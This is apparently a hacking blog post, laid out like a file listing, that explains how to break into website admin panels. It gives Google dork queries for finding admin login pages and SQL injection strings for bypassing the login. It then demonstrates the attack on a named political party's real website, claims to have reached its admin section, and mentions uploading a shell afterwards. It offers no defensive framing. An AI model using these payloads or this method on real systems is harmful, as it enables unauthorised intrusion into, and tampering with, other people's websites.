| Filename | BYPASSING ADMIN PASSWORD AND GETTING ADMIN LEVEL ACCESS |
| Permission | rw-r--r-- |
| Author | Unknown |
| Date and Time | 01:37 |
| Label | hacker - Bảo Mật |
| Action |

STEP 1:- GOOGLE DORKING
Go to www.google.com and search for
"inurl:adminlogin.asp"
or
"inurl:admin_login.php"
Search result will give you huge list of admin panel of different website.
STEP 2:- ADMIN BYPASSING
Now you have admin login to have admin level access by just entering
USERNAME and PASSWORD.
Benefits of Admin Level Access,
You can make changes to the website content.
You can upload your content on website even if your shell.
and many more options...:)
Now enter following SQL code in Username and Password box,
1'or'1'='1
'or''='
a)or(a)=(a
and many more...
For SQL cheat codes refer to,
http://ha.ckers.org/sqlinjection/
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
STEP 3:- DEMO PART
Lets go to Official Website of Bhartiya Janta Party,
http://bjpmp.org.in

Go to Admin Panel of website by just typing,
http://bjpmp.org.in/admin

Ohhhoo....its admin panel
Now we have to do Bypassing part,
Enter Username:- 1'or'1'='1
And Password:- 1'or'1'='1
And See what happened,

We have In Admin Section.
You have just hacked Official Website of Bhartiya Janta Party [ M.P. ].
All the Best..K33P Hacking...:)
0 nhận xét:
Đăng nhận xét